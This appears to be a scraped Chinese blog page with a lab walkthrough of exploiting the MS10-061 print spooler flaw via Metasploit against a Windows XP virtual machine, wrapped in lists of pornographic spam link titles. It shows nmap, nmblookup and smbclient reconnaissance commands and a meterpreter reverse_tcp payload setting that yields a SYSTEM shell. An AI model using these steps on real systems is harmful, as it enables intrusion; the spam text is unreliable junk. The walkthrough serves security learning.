日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

Kali利用msf对MS10_061漏洞进行渗透测试

發布時間:2023/12/2 编程问答 42 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Kali利用msf对MS10_061漏洞进行渗透测试 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

注意事項:

  • kail首次打開metasploit,會初始化數據,可能會有點慢,請耐心等待!
  • 本文僅供學習漏洞滲透測試,不得用于其他非法用途,否則造成的任何后果自負!!!

1. Metasploit簡介

Metasploit是一款開源的安全漏洞檢測工具,可以幫助安全和IT專業人士識別安全性問題,驗證漏洞的緩解措施,并管理專家驅動的安全性進行評估,提供真正的安全風險情報。這些功能包括智能開發,代碼審計,Web應用程序掃描,社會工程。詳細介紹可以參考百度百科對 Mettasploit 的介紹。

2.打印后臺程序服務模擬漏洞(CVE-2010-2729/MS10-061)

利用MSF中的攻擊模塊:ms10_061_spoolss,Windows打印后臺程序沒有充分的限制訪問該服務的用戶權限,攻擊者可以通過提交特制的打印請求在Windows系統目錄(%SystemRoot%\system32)中創建文件。攻擊者可以指定任何文件名,包括目錄遍歷,通過WritePrinter請求,攻擊者可以完全控制創建文件的內容。將文件寫入到Windows系統目錄(%SystemRoot%\system32)后,通過WMI來部署惡意程序,因為系統會自動運行%SystemRoot%\System32\Wbem\MOF文件夾的mof文件、執行命令。
該漏洞首次被發現并被利用于著名的Stuxnet蠕蟲(俗稱“震網”)

3.實驗環境

VMware虛擬環境
攻擊機:Kali Linux;目標機:Windows xp sp2

4.實驗步驟

4.1 使用Nmap掃描目標機器是否存在NetBios和RPC服務
4.2 NetBios共享檢測
4.3 使用MSF的ms10_061_spoolss模塊攻擊目標機

5.設置目標機環境

  • 獲取目標機IP
  • 創建打印共享(默認是沒有打印共享)
    1)代開控制面板,選擇打印機和其他硬件2)選擇打印機和傳真
    3)添加打印機4)本地打印機,不勾選“自動檢測并安裝即插即用打印機”
    5)選擇使用LPT1端口
    隨便選一個打印機廠商和型號取個名字選擇共享打印機
  • 6.在Kali上檢測打印機

    1)nmap掃描

    nmap -sS -sU -O -p127-139,445 192.168.230.137
    • 1


    2)查找NetBIOS

    nmblookup -A 192.168.230.137
    • 1


    NetBIOS工作站名字:123-13DFCFEDD88
    NetBIOS組名:WORKGROUP

    7.訪問SMB資源

    smbclient -L \\123-13DFCFEDD88 -I 192.168.230.137 -N
    • 1


    看到了打印共享

    8.使用MSF模塊攻擊

    1)載入模塊,搜索一下ms10_061
    2)利用漏洞,并查看需要配置的參數

    3)配置參數4)設置Payload

    set payload windows/meterpreter/reverse_tcp
    • 1

    5)設置Payload參數6)攻擊攻擊完成后,建立了遠程會話,惡意程序寫入到目標機的%SystemRoot%\system32\2Uy3ygTXtpVrWD.exe,惡意程序是通過%SystemRoot%\system32\wbem\mof\5V4jdMrNNFWWSH.mof控制運行的。
    7)接下來可以執行一系列操作
    getuid,getpid
    可以看到我們獲取了系統的system權限

    此時執行shell可以進入目標機的命令行界面
    至此,整個攻擊過程已經大體結束,之后可以進行取證等一系列工作。最后感謝各位的閱讀,由于本人水平有限,如有不足,敬請諒解。

    創作挑戰賽新人創作獎勵來咯,堅持創作打卡瓜分現金大獎

    總結

    以上是生活随笔為你收集整理的Kali利用msf对MS10_061漏洞进行渗透测试的全部內容,希望文章能夠幫你解決所遇到的問題。

    如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

    主站蜘蛛池模板: 国产女人18毛片水真多18精品 | 国产夫妻在线观看 | 国产视频1 | 激情六月 | 伊人五月综合 | 日韩精品一二 | 日韩一区高清 | 婷婷六月丁 | 粗喘呻吟撞击猛烈疯狂 | 欧洲成人一区二区三区 | 蜜桃精品一区二区 | 噜噜在线视频 | 少妇又紧又爽视频 | 国产一二在线观看 | 日韩欧美影院 | 免费一二区 | 日本wwwwwww| 72pao成人国产永久免费视频 | 日韩中文字幕免费在线观看 | 撸啊撸在线视频 | www.蜜臀av| 精品日韩在线观看 | 人人干人人玩 | 狠狠干2018| 淫视频网站 | 国产综合精品视频 | 国产精品影院在线观看 | 亚洲妇女av | 一卡二卡三卡在线视频 | 狠狠的日| 熊出没之冬日乐翻天免费高清观看 | 超碰成人久久 | 天天人人精品 | 午夜网址 | 午夜视频一区二区三区 | 噜噜噜av| 亚洲av不卡一区二区 | 欧美激情一区二区在线 | wwwjizzzcom | 蜜乳av懂色av粉嫩av | 国产三级福利 | 久久人妻无码aⅴ毛片a片app | 亚洲666 | 老熟妇仑乱视频一区二区 | 日韩精品四区 | 四虎黄色 | 天天摸日日 | 非洲一级黄色片 | 天天色影网 | 免费视频中文字幕 | 国产精品99精品无码视亚 | 欧美夜夜夜 | 黄色美女免费网站 | 欧美一区高清 | 亚洲精品国产手机 | 亚洲自拍偷拍综合 | 亚洲一区二区色 | 2020亚洲天堂 | 自拍偷拍精品视频 | 久久久麻豆 | 亚洲视频播放 | 偷自在线 | jlzzjlzzjlzz亚洲人 | 曰本三级日本三级日本三级 | 四虎www | 国产一极片 | 啊av在线| 欧美综合自拍亚洲综合图片区 | 天堂在线免费视频 | 伊人久久青草 | 少妇搡bbbb搡bbb搡澳门 | 91羞羞网站 | 国产乱码精品一区二区 | 午夜神马福利 | 亚洲欧美日韩在线看 | 日韩精品中文字幕一区二区三区 | 少妇看片| 91精品国产一区二区在线观看 | 免费在线播放黄色片 | 国产日批视频 | av网址在线 | 久操精品| 美丽的小蜜桃2:美丽人生 | 加勒比成人av | 天堂av中文字幕 | 曰女同女同中文字幕 | 国产香蕉视频在线观看 | 国产一区二区激情 | 亚洲黄色av网站 | 久久久中文字幕 | www.爱爱.com| 天天拍天天操 | 欧美性生交xxxxx久久久缅北 | 日日射天天操 | 精品少妇久久久久久888优播 | 最新中文字幕 | 亚洲日日干 | av免费网站 | 欧美色图亚洲色 |